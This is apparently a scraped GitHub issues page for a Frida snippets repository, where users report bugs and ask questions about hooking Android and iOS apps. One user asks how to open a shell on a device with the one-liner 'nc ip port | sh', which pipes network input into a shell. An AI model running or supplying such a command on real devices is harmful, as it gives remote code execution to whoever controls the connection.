iddoeldor / frida-snippets Goto Github PK
View Code? Open in Web Editor NEWHand-crafted Frida examples
Hand-crafted Frida examples
the script use "nm -C -D" to get arguments of module, and i tried that on libc.so and i get
00072720 T pthread_rwlockattr_getkind_np
000726d0 T pthread_rwlockattr_getpshared
00072690 T pthread_rwlockattr_init
00072740 T pthread_rwlockattr_setkind_np
000726f0 T pthread_rwlockattr_setpshared
00072800 T pthread_rwlock_destroy
00072770 T pthread_rwlock_init
00072820 T pthread_rwlock_rdlock
00072c10 T pthread_rwlock_timedrdlock
00073030 T pthread_rwlock_timedwrlock
00072c40 T pthread_rwlock_tryrdlock
00073060 T pthread_rwlock_trywrlock
there's no signature info... And i checked that ELF format do not store signature info. So it there another way of getting signature of method by Frida?
Many thanks.
Hello there, I've been testing your scripts and i think i run into problem with trace_class.js.
Could you please confirm if following is expected output ?:
... {"tracing":"java.net.Socket.setSoLinger","overloaded":1} {"tracing":"java.net.Socket.setSoTimeout","overloaded":1} {"tracing":"java.net.Socket.setTcpNoDelay","overloaded":1} {"tracing":"java.net.Socket.setTrafficClass","overloaded":1} {"tracing":"java.net.Socket.shutdownInput","overloaded":1} {"tracing":"java.net.Socket.shutdownOutput","overloaded":1} {"tracing":"java.net.Socket.toString","overloaded":1} {"tracing":"java.net.Socket.cacheLocalAddress","overloaded":1} {"tracing":"java.net.Socket.checkDestination","overloaded":1} {"tracing":"java.net.Socket.checkOpenAndCreate","overloaded":1} {"tracing":"java.net.Socket.setSocketImplFactory","overloaded":1} {"tracing":"java.net.Socket.startupSocket","overloaded":1} {"tracing":"java.net.Socket.tryAllAddresses","overloaded":1} {"tracing":"java.net.Socket.usingSocks","overloaded":1} ...
To me it looks like hook[targetMethod].overloads[i].implementation = function...
never gets called for some reason.
Android version: 5.0.1
Java.perform(function () {
send("Starting hook proxy bypass");
var ActivityThread = Java.use('android.app.ActivityThread');
var ConnectivityManager = Java.use('android.net.ConnectivityManager');
var ProxyInfo = Java.use('android.net.ProxyInfo');
var proxyInfo = ProxyInfo.$new('10.1.11.42', 8080, ''); // change to null in order to disable the proxy.
var context = ActivityThread.currentApplication().getApplicationContext();
var connectivityManager = Java.cast(context.getSystemService('connectivity'), ConnectivityManager);
connectivityManager.setGlobalProxy(proxyInfo);
});
TypeError: cannot read property 'getApplicationContext' of null
at [anon] (duk_hobject_props.c:2384)
at [anon] (/repl1.js:9)
at frida/node_modules/frida-java/lib/vm.js:43
at M (frida/node_modules/frida-java/index.js:347)
at frida/node_modules/frida-java/index.js:333
at input:1
crashed when hook variadic function.
public final boolean gesture(long j, long j2, int[]... iArr)
I just got a course in regards to Frida and I was wondering how I would use these scripts to get a shell in the device I want to run the toybox command
nc ip port | sh
I know it is possible I just needed guidance
https://github.com/iddoeldor/frida-snippets#reveal-native-methods
the "method" of output is not right.
maybe you should change like below,somehow it works for me.
var structSize = pSize * 3; // = sizeof(JNINativeMethod)
var methodsPtr = ptr(args[2]);
var signature = methodsPtr.add(i * structSize + pSize).readPointer();
var fnPtr = methodsPtr.add(i * structSize + (pSize * 2)).readPointer(); // void* fnPtr
var jClass = jclassAddress2NameMap[args[0]].split('/');
var methodName = methodsPtr.add(i * structSize).readPointer().readCString(); // <------ here
console.log('\x1b[3' + '6;01' + 'm', JSON.stringify({
module: DebugSymbol.fromAddress(fnPtr)['moduleName'], // https://www.frida.re/docs/javascript-api/#debugsymbol
package: jClass.slice(0, -1).join('.'),
class: jClass[jClass.length - 1],
method: methodName, // methodsPtr.readPointer().readCString(), // char* name <------ here
signature: signature.readCString(), // char* signature TODO Java bytecode signature parser { Z: 'boolean', B: 'byte', C: 'char', S: 'short', I: 'int', J: 'long', F: 'float', D: 'double', L: 'fully-qualified-class;', '[': 'array' } https://github.com/skylot/jadx/blob/master/jadx-core/src/main/java/jadx/core/dex/nodes/parser/SignatureParser.java
address: fnPtr
}), '\x1b[39;49;00m');
Hey Team,
I was wondering if you could update the documentation for the iOS screenshot example to include the relevant imports in addition to providing a usage example
Hi, I will be grateful if you create a script (Android) for okhttp3 request/response log.
thk
Hi. I have one question. I have function in c++ MyEngine::Core::GenerateUniqueKey(). this function inside my MyEngine.framework (IOS).
How I can hook this function using Frida?
The snippet for creating a Toast on Android doesn't seem to work:
[Android Emulator 5554::owasp.mstg.uncrackable1]-> Java.scheduleOnMainThread(function() {
Java.use("android.widget.Toast")
.makeText(
Java.use("android.app.ActivityThread").currentApplication().getApplicationContext(),
"Text to Toast here",
0 // https://developer.android.com/reference/android/widget/Toast#LENGTH_LONG
)
.show();
});
Error: makeText(): argument types do not match any of:
.overload('android.content.Context', 'int', 'int')
.overload('android.content.Context', 'java.lang.CharSequence', 'int')
.overload('android.content.Context', 'android.os.Looper', 'java.lang.CharSequence', 'int')
at pe (frida/node_modules/frida-java-bridge/lib/class-factory.js:549)
at frida/node_modules/frida-java-bridge/lib/class-factory.js:951
at [anon] (input:7)
at frida/node_modules/frida-java-bridge/index.js:288
[Android Emulator 5554::owasp.mstg.uncrackable1]-> Frida.version
"12.8.20"
https://github.com/frida/frida-java/issues/78,this issue,do you know how to got it ?
Code:
function observeClass(name) {
var k = ObjC.classes[name];
k.$ownMethods.forEach(function(m) {
var impl = k[m].implementation;
console.log('Observing ' + name + ' ' + m);
Interceptor.attach(impl, {
onEnter: function(a) {
this.log = [];
this.log.push('(' + a[0] + ',' + Memory.readUtf8String(a[1]) + ') ' + name + ' ' + m);
if (m.indexOf(':') !== -1) {
var params = m.split(':');
params[0] = params[0].split(' ')[1];
for (var i = 0; i < params.length - 1; i++) {
try {
this.log.push(params[i] + ': ' + new ObjC.Object(a[2 + i]).toString());
} catch (e) {
this.log.push(params[i] + ': ' + a[2 + i].toString());
}
}
}
this.log.push(
Thread.backtrace(this.context, Backtracer.ACCURATE)
.map(DebugSymbol.fromAddress)
.join('\n')
);
},
onLeave: function(r) {
try {
this.log.push('RET: ' + new ObjC.Object(r).toString());
} catch (e) {
this.log.push('RET: ' + r.toString());
}
console.log(this.log.join('\n') + '\n');
}
});
});
}
setImmediate(observeClass('EKEventStore'));
Error Message:
object_getClass + 4 libobjc.A.dylib
object_getClass:libobjc.A.dylib`object_setClass:
0x1b7c1be8 <+0>: push {r4, r5, r7, lr}
Socket activity example:
Process
.getModuleByName({ linux: 'libc.so', darwin: 'libSystem.B.dylib', windows: 'ws2_32.dll' }[Process.platform])
.enumerateExports().filter(ex => ex.type === 'function' && ['connect', 'recv', 'send', 'read', 'write'].some(prefix => ex.name.indexOf(prefix) === 0))
.forEach(ex => {
Interceptor.attach(ex.address, {
onEnter: function (args) {
var fd = args[0].toInt32();
if (Socket.type(fd) !== 'tcp')
return;
var address = Socket.peerAddress(fd);
if (address === null)
return;
console.log(fd, ex.name, address.ip + ':' + address.port);
}
})
})
Got an error:
Error TS2339: Property 'ip' does not exist on type 'SocketEndpointAddress'. Property 'ip' does not exist on type 'UnixEndpointAddress'.
Same for the port
property.
If use JSON.Stringify(address)
got:
{"ip": "0.0.0.0", "port": 0}
for every connection.
Frida 12.8.14
In Objective-C, there is the following code:
{
responseBody = {
result = (
{
contentId = 1272801112155672577;
title = "\U6d3b\U52a81";
titleName = "\U6d3b\U52a81";
validTime = "2020-06-16T08:00:07.000+0000";
},
{
contentId = 1273531592463273984;
title = "uat\U6d3b\U52a8\U6d4b\U8bd52";
titleName = "uat\U6d3b\U52a8\U6d4b\U8bd52uat\U6d3b\U52a8\U6d4b\U8bd52";
validTime = "2020-06-18T08:22:47.000+0000";
}
);
};
responseCode = GL000000;
responseDate = 20200710;
responseJnlNo = 1281589810019606528;
responseMsg = "";
responseTime = "20200710 22:03:16";
}
How to convert this complex dictionary into JSON, and how to convert JSON into such a complex dictionary at the same time.
copy Socket activity example to script.js
Process
.getModuleByName({ linux: 'libc.so', darwin: 'libSystem.B.dylib', windows: 'ws2_32.dll' }[Process.platform])
.enumerateExports().filter(ex => ex.type === 'function' && ['connect', 'recv', 'send', 'read', 'write'].some(prefix => ex.name.indexOf(prefix) === 0))
.forEach(ex => {
Interceptor.attach(ex.address, {
onEnter: function (args) {
var fd = args[0].toInt32();
if (Socket.type(fd) !== 'tcp')
return;
var address = Socket.peerAddress(fd);
if (address === null)
return;
console.log(fd, ex.name, address.ip + ':' + address.port);
}
})
})
execute:
frida -U com.xxxx.xxxx -l script.js --no-pause
____
/ _ | Frida 12.11.17 - A world-class dynamic instrumentation toolkit
| (| |
> _ | Commands:
// |_| help -> Displays the help system
. . . . object? -> Display information about 'object'
. . . . exit/quit -> Exit
. . . .
. . . . More info at https://www.frida.re/docs/home/
Failed to load script: script(line 3): SyntaxError: parse error
I am using the observe class method for Frida and am successfully able to hook into the function. However the logging is a bit cryptic.
For this example, assumine the class is MainClass
and the method in it that I'm observing is ChildMethod
My end goal is to call ChildMethod manually but to do that I need to replicate and pass in the arguments through Frida, which I am trying to get by observing them in the following. I'm used to variables and passing them into functions - whereas this code is slightly cryptic. How do I achieve this end goal - and which of these is the actual args in the function?
0x105082d74 winnerscircle20!0x3ded74 (0x1003ded74)
0x105082ee8 winnerscircle20!0x3deee8 (0x1003deee8)
0x1051f5638 winnerscircle20!0x551638 (0x100551638)
0x1057c62a0 FBLPromises!0x62a0 (0x62a0)
0x183a0d298 libdispatch.dylib!_dispatch_call_block_and_release
0x183a0e280 libdispatch.dylib!_dispatch_client_callout
0x1839bd0ac libdispatch.dylib!_dispatch_main_queue_callback_4CF$VARIANT$mp
0x183d555e0 CoreFoundation!__CFRUNLOOP_IS_SERVICING_THE_MAIN_DISPATCH_QUEUE__
0x183d4fa88 CoreFoundation!__CFRunLoopRun
0x183d4eba0 CoreFoundation!CFRunLoopRunSpecific
0x19aab7598 GraphicsServices!GSEventRunModal
0x1866402f4 UIKitCore!-[UIApplication _run]
0x186645874 UIKitCore!UIApplicationMain
0x104ca80ec winnerscircle20!0x40ec (0x1000040ec)
0x183a2d568 libdyld.dylib!start
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.